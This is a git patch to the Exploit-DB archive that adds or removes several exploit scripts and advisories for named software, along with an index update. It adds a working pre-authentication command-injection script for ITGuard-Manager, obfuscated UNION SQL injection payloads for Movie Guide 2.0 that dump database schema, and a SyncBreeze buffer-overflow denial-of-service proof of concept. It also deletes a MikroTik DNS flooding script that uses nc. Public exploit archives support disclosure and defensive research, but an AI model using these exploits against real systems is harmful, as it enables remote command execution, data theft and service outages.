From cfef56c321b2731b6126e31526cd26232bf1531c Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 16 Dec 2017 05:02:18 +0000 Subject: [PATCH] DB: 2017-12-16 5 changes to exploits/shellcodes MikroTik RouterBoard 6.39.2 / 6.40.5 DNS - Denial of Service Sync Breeze 10.2.12 - Denial of Service ITGuard-Manager 0.0.0.1 - Remote Code Execution Movie Guide 2.0 - SQL Injection --- exploits/cgi/webapps/43343.py | 49 +++++++++++++++++++ exploits/hardware/dos/43200.py | 41 ---------------- exploits/php/webapps/43346.txt | 51 ++++++++++++++++++++ exploits/windows/dos/43344.py | 88 ++++++++++++++++++++++++++++++++++ files_exploits.csv | 4 +- 5 files changed, 191 insertions(+), 42 deletions(-) create mode 100755 exploits/cgi/webapps/43343.py delete mode 100755 exploits/hardware/dos/43200.py create mode 100644 exploits/php/webapps/43346.txt create mode 100755 exploits/windows/dos/43344.py diff --git a/exploits/cgi/webapps/43343.py b/exploits/cgi/webapps/43343.py new file mode 100755 index 000000000..8ac0d2bf5 --- /dev/null +++ b/exploits/cgi/webapps/43343.py @@ -0,0 +1,49 @@ +# Vulnerability Title: ITGuard-Manager V0.0.0.1 PreAuth Remote Code Execution +# Author: Nassim Asrir +# Contact: wassline@gmail.com / @asrir_nassim +# CVE: Waiting ... +# CVSS: CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:H/E:H/MAV:P3.0/AV:P/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:H/E:H/MAV:P +# Vendor: http://www.innotube.com + + +Details: +======== + +First we need to know what happens when we need to LogIn. +When the User or Attacker insert any strings in the login form he/she will get this POST request: + +POST /cgi-bin/drknow.cgi?req=login HTTP/1.1 +Host: server +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Referer: http://server/log-in.html?lang=KOR +Content-Type: application/x-www-form-urlencoded +Content-Length: 45 +Connection: close +Upgrade-Insecure-Requests: 1 + +req=login&lang=KOR&username=admin&password=admin + + +Ok now we have this POST request and all we care about is the ‘username’ parameter . and we +can execute our system commands via this parameter due to missing input sanitization. +The payload will be: 'admin|'command'||x we will change the command by any *unix command (ls – id – mkdir ….) + +Exploit: +======= + +#i am not responsible for any wrong use. + +import requests +target = raw_input('Target(With proto) : ') +command = raw_input('Command To Execute : ') +fullpath=target +"/cgi-bin/drknow.cgi?req=login" +data = {'req':'login', + 'lang':'ENG', + 'username':'admin|'+command+'||x', + 'password':'admin'} + +execute = requests.post(fullpath, data = data) + +print execute.text \ No newline at end of file diff --git a/exploits/hardware/dos/43200.py b/exploits/hardware/dos/43200.py deleted file mode 100755 index 7759591e6..000000000 --- a/exploits/hardware/dos/43200.py +++ /dev/null @@ -1,41 +0,0 @@ -import socket -import os -import time -from threading import Thread -import sys - - -def rep1(): - os.system('echo -ne "\x4d\x69\x6b\x72\x6f\x54\x69\x6b\x20\x44\x65\x6e\x69\x61\x6c\x20\x6f\x66\x20\x53\x65\x72\x76\x69\x63\x65\x20\x6f\x6e\x20\x44\x4e\x53\x20\x73\x65\x72\x76\x69\x63\x65\x2e\x20\x48\x6f\x73\x65\x69\x6e\x20\x41\x73\x6b\x61\x72\x69" | dd conv=notrunc bs=1000 seek=500 of=/home/constantine/test/poc') - os.system('cat poc | nc -v 192.168.1.1 53') - -def rep2(): - os.system('cat poc | nc -v 192.168.1.1 53') - -def rep3(): - os.system('cat poc | nc -v 192.168.1.1 53') - -def rep4(): - os.system('cat poc | nc -v 192.168.1.1 53') - -def rep5(): - os.system('cat poc | nc -v 192.168.1.1 53') - - - -if __name__ == "__main__": - threads = [] - try: - for a in [rep1, rep2, rep3, rep4, rep5]: - t = Thread(target=a) - t.start() - threads.append(t) - time.sleep(4) - time.sleep(4) - print("For Stopping the attack, Hit CTRL+C now") - - - except KeyboardInterrupt: - sys.exit(0) - finally: - [t.join() for t in threads] \ No newline at end of file diff --git a/exploits/php/webapps/43346.txt b/exploits/php/webapps/43346.txt new file mode 100644 index 000000000..c7a5d22a9 --- /dev/null +++ b/exploits/php/webapps/43346.txt @@ -0,0 +1,51 @@ +# # # # # +# Exploit Title: Movie Guide 2.0 - SQL Injection +# Dork: N/A +# Date: 15.12.2017 +# Vendor Homepage: http://applebitemedia.com/ +# Software Link: http://applebitemedia.com/amwdl/AM_Movie_Guide.tar.gz +# Version: 2.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# 1) +# http://localhost/[PATH]/index.php?md=[SQL] +# +# %2dV'%20%20%2f*!02222UNION*%2f(%2f*!02222SELECT*%2f%200x253238253331253239%2c0x253238253332253239%2c(%2f*!02222Select*%2f%20export_set(5%2c@:=0%2c(%2f*!02222select*%2f%20count(*)%2f*!02222from*%2f(information_schema.columns%29where@:=export_set(5%2cexport_set(5%2c@%2c%2f*!02222table_name*%2f%2c0x3c6c693e%2c2)%2c%2f*!02222column_name*%2f%2c0xa3a%2c2))%2c@%2c2))%2c0x253238253334253239%2c0x253238253335253239%2c0x253238253336253239%2c0x253238253337253239%2c0x253238253338253239%2c0x253238253339253239%2c0x253238253331253330253239%2c0x253238253331253331253239%2c0x253238253331253332253239)%2d%2d%20%2d +# +# 2) +# http://localhost/[PATH]/index.php?pid=minfo&Movie_Id=[SQL] +# +# %2dV'%20%20%2f*!02222UNION*%2f(%2f*!02222SELECT*%2f%200x253238253331253239%2c0x253238253332253239%2c(%2f*!02222Select*%2f%20export_set(5%2c@:=0%2c(%2f*!02222select*%2f%20count(*)%2f*!02222from*%2f(information_schema.columns%29where@:=export_set(5%2cexport_set(5%2c@%2c%2f*!02222table_name*%2f%2c0x3c6c693e%2c2)%2c%2f*!02222column_name*%2f%2c0xa3a%2c2))%2c@%2c2))%2c0x253238253334253239%2c0x253238253335253239%2c0x253238253336253239%2c0x253238253337253239%2c0x253238253338253239%2c0x253238253339253239%2c0x253238253331253330253239%2c0x253238253331253331253239%2c0x253238253331253332253239)%2d%2d%20%2d +# +# 3) +# http://localhost/[PATH]/index.php?director=[SQL] +# +# a'%20%20%2f*!02222UNION*%2f(%2f*!02222SELECT*%2f%200x253238253331253239%2c0x253238253332253239%2c(%2f*!02222Select*%2f%20export_set(5%2c@:=0%2c(%2f*!02222select*%2f%20count(*)%2f*!02222from*%2f(information_schema.columns%29where@:=export_set(5%2cexport_set(5%2c@%2c%2f*!02222table_name*%2f%2c0x3c6c693e%2c2)%2c%2f*!02222column_name*%2f%2c0xa3a%2c2))%2c@%2c2))%2c0x253238253334253239%2c0x253238253335253239%2c0x253238253336253239%2c0x253238253337253239%2c0x253238253338253239%2c0x253238253339253239%2c0x253238253331253330253239%2c0x253238253331253331253239%2c0x253238253331253332253239)%2d%2d%20%2d +# +# 4) +# http://localhost/[PATH]/index.php?actor=[SQL] +# +# -a'%20%20%2f*!02222UNION*%2f(%2f*!02222SELECT*%2f%200x253238253331253239%2c0x253238253332253239%2c(%2f*!02222Select*%2f%20export_set(5%2c@:=0%2c(%2f*!02222select*%2f%20count(*)%2f*!02222from*%2f(information_schema.columns%29where@:=export_set(5%2cexport_set(5%2c@%2c%2f*!02222table_name*%2f%2c0x3c6c693e%2c2)%2c%2f*!02222column_name*%2f%2c0xa3a%2c2))%2c@%2c2))%2c0x253238253334253239%2c0x253238253335253239%2c0x253238253336253239%2c0x253238253337253239%2c0x253238253338253239%2c0x253238253339253239%2c0x253238253331253330253239%2c0x253238253331253331253239%2c0x253238253331253332253239)%2d%2d%20%2d +# +# 5) +# http://localhost/[PATH]/index.php?gterm=[SQL] +# +# -a'%20%20%2f*!02222UNION*%2f(%2f*!02222SELECT*%2f%200x253238253331253239%2c0x253238253332253239%2c(%2f*!02222Select*%2f%20export_set(5%2c@:=0%2c(%2f*!02222select*%2f%20count(*)%2f*!02222from*%2f(information_schema.columns%29where@:=export_set(5%2cexport_set(5%2c@%2c%2f*!02222table_name*%2f%2c0x3c6c693e%2c2)%2c%2f*!02222column_name*%2f%2c0xa3a%2c2))%2c@%2c2))%2c0x253238253334253239%2c0x253238253335253239%2c0x253238253336253239%2c0x253238253337253239%2c0x253238253338253239%2c0x253238253339253239%2c0x253238253331253330253239%2c0x253238253331253331253239%2c0x253238253331253332253239)%2d%2d%20%2d +# +# 6) +# http://localhost/[PATH]/index.php?year=[SQL] +# +# -a'%20%20%2f*!02222UNION*%2f(%2f*!02222SELECT*%2f%200x253238253331253239%2c0x253238253332253239%2c(%2f*!02222Select*%2f%20export_set(5%2c@:=0%2c(%2f*!02222select*%2f%20count(*)%2f*!02222from*%2f(information_schema.columns%29where@:=export_set(5%2cexport_set(5%2c@%2c%2f*!02222table_name*%2f%2c0x3c6c693e%2c2)%2c%2f*!02222column_name*%2f%2c0xa3a%2c2))%2c@%2c2))%2c0x253238253334253239%2c0x253238253335253239%2c0x253238253336253239%2c0x253238253337253239%2c0x253238253338253239%2c0x253238253339253239%2c0x253238253331253330253239%2c0x253238253331253331253239%2c0x253238253331253332253239)%2d%2d%20%2d +# +# # # # # \ No newline at end of file diff --git a/exploits/windows/dos/43344.py b/exploits/windows/dos/43344.py new file mode 100755 index 000000000..13242f9be --- /dev/null +++ b/exploits/windows/dos/43344.py @@ -0,0 +1,88 @@ +============================================= +MGC ALERT 2017-007 +- Original release date: November 30, 2017 +- Last revised: December 14, 2017 +- Discovered by: Manuel García Cárdenas +- Severity: 7,5/10 (CVSS Base Score) +- CVE-ID: CVE-2017-17088 +============================================= + +I. VULNERABILITY +------------------------- +SyncBreeze <= 10.2.12 - Denial of Service + +II. BACKGROUND +------------------------- +SyncBreeze is a fast, powerful and reliable file synchronization solution +for local disks, network shares, NAS storage devices and enterprise storage +systems. + +III. DESCRIPTION +------------------------- +The Enterprise version of SyncBreeze is affected by a Remote Denial of +Service vulnerability. + +The web server does not check bounds when reading server request in the +Host header on making a connection, resulting in a classic Buffer Overflow +that causes a Denial of Service. + +To exploit the vulnerability only is needed use the version 1.1 of the HTTP +protocol to interact with the application. + +IV. PROOF OF CONCEPT +------------------------- +#!/usr/bin/python +import sys, socket + +host = sys.argv[1] +buffer="GET / HTTP/1.1\r\n" +buffer+="Host: "+"A"*2000+"\r\n\r\n" + +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +s.connect((host, 80)) +s.send(buffer) +s.close() + +V. BUSINESS IMPACT +------------------------- +Availability compromise can result from these attacks. + +VI. SYSTEMS AFFECTED +------------------------- +SyncBreeze <= 10.2.12 + +VII. SOLUTION +------------------------- +Vendor release 10.3 version +http://www.syncbreeze.com/setups/syncbreezeent_setup_v10.3.14.exe + +VIII. REFERENCES +------------------------- +http://www.syncbreeze.com/ + +IX. CREDITS +------------------------- +This vulnerability has been discovered and reported +by Manuel García Cárdenas (advidsec (at) gmail (dot) com). + +X. REVISION HISTORY +------------------------- +November 30, 2017 1: Initial release +December 14, 2017 2: Revision to send to lists + +XI. DISCLOSURE TIMELINE +------------------------- +November 30, 2017 1: Vulnerability acquired by Manuel Garcia Cardenas +November 30, 2017 2: Send to vendor +December 6, 2017 3: Vendor fix the vulnerability and release a new version +December 14, 2017 4: Send to the Full-Disclosure lists + +XII. LEGAL NOTICES +------------------------- +The information contained within this advisory is supplied "as-is" with no +warranties or guarantees of fitness of use or otherwise. + +XIII. ABOUT +------------------------- +Manuel Garcia Cardenas +Pentester \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 9e66678ab..4ffec1da7 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -5763,7 +5763,6 @@ id,file,description,date,author,type,platform,port 43189,exploits/android/dos/43189.py,"Android Gmail < 7.11.5.176568039 - Directory Traversal in Attachment Download",2017-11-28,"Google Security Research",dos,android, 43194,exploits/linux/dos/43194.txt,"QEMU - NBD Server Long Export Name Stack Buffer Overflow",2017-11-29,"Eric Blake",dos,linux, 43199,exploits/linux/dos/43199.c,"Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page",2017-11-30,Bindecy,dos,linux, -43200,exploits/hardware/dos/43200.py,"MikroTik RouterBoard 6.39.2 / 6.40.5 DNS - Denial of Service",2017-11-30,FarazPajohan,dos,hardware, 43207,exploits/windows/dos/43207.txt,"Abyss Web Server < 2.11.6 - Heap Memory Corruption",2017-12-01,hyp3rlinx,dos,windows, 43229,exploits/windows/dos/43229.cs,"Microsoft Windows Defender - Controlled Folder Bypass Through UNC Path",2017-12-07,"Google Security Research",dos,windows, 43233,exploits/multiple/dos/43233.txt,"Wireshark 2.4.0 < 2.4.2 / 2.2.0 < 2.2.10 - CIP Safety Dissector Crash",2017-12-07,Wireshark,dos,multiple, @@ -5778,6 +5777,7 @@ id,file,description,date,author,type,platform,port 43326,exploits/multiple/dos/43326.c,"macOS/iOS - Multiple Kernel Use-After-Frees due to Incorrect IOKit Object Lifetime Management in IOTimeSyncClockManagerUserClient",2017-12-12,"Google Security Research",dos,multiple, 43327,exploits/macos/dos/43327.c,"macOS - Kernel Code Execution due to Lack of Bounds Checking in AppleIntelCapriController::GetLinkConfig",2017-12-12,"Google Security Research",dos,macos, 43328,exploits/multiple/dos/43328.c,"macOS/iOS - Kernel Double Free due to Incorrect API Usage in Flow Divert Socket Option Handling",2017-12-12,"Google Security Research",dos,multiple, +43344,exploits/windows/dos/43344.py,"Sync Breeze 10.2.12 - Denial of Service",2017-12-15,"Manuel García Cárdenas",dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -38374,3 +38374,5 @@ id,file,description,date,author,type,platform,port 43336,exploits/php/webapps/43336.html,"Bus Booking Script 1.0 - 'txtname' SQL Injection",2017-12-14,"Ihsan Sencan",webapps,php, 43337,exploits/php/webapps/43337.txt,"Piwigo 2.9.1 - 'cat_true' / 'cat_false' SQL Injection",2017-12-14,Akityo,webapps,php, 43340,exploits/windows/webapps/43340.rb,"Advantech WebAccess 8.2-2017.03.31 - Webvrpcs Service Opcode 80061 Stack Buffer Overflow (Metasploit)",2017-12-14,Metasploit,webapps,windows,4592 +43343,exploits/cgi/webapps/43343.py,"ITGuard-Manager 0.0.0.1 - Remote Code Execution",2017-12-15,"Nassim Asrir",webapps,cgi, +43346,exploits/php/webapps/43346.txt,"Movie Guide 2.0 - SQL Injection",2017-12-15,"Ihsan Sencan",webapps,php,80